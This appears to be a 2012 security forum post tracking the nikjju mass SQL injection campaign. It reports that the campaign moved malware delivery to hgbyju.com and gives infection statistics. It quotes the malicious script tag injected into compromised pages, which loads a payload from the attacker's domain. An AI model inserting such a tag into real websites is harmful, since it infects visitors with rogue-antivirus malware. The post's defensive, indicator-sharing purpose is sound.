Nikjju SQL injection update (now hgbyju .com/r.php)
April 22, 2012 - "We posted a few days ago about a Mass SQL injection campaign* that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju .com malware. However, since the last two days, the attackers switched domain names and are now using hgbyju .com to distribute their malware (also hosted at 18.104.22.168). So the following code is now getting added to the compromised web sites:
<script src = http ://hgbyju .com/r.php <</script> ..."
April 17, 2012
Last Updated: 2012-04-24 00:17:18 UTC - "... resulting fake/rogue AV campaigns they subject victims to..."
"... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
"... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
"... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."
Edited by AplusWebMaster, 24 April 2012 - 10:37 AM.